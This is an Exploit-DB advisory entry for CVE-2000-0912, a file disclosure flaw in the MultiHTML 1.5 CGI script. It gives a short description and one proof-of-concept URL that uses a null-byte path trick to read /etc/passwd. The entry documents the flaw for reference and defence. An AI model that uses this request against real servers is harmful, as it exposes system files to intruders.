MultiHTML 1.5 File Disclosure Vulnerability

2000-09-13T00:00:00
ID EDB-ID:22204
Type exploitdb
Reporter Niels Heinen
Modified 2000-09-13T00:00:00

Description

MultiHTML 1.5 File Disclosure Vulnerability. CVE-2000-0912. Webapps exploit for cgi platform

                                        
                                            source: http://www.securityfocus.com/bid/6711/info

MultiHTML is prone to a file disclosure vulnerability.

It is possible for remote attackers to issue requests which are capable of disclosing sensitive webserver readable resources on the system hosting the software.

http://www.example.com/cgi-bin/multihtml.pl?multi=/etc/passwd%00html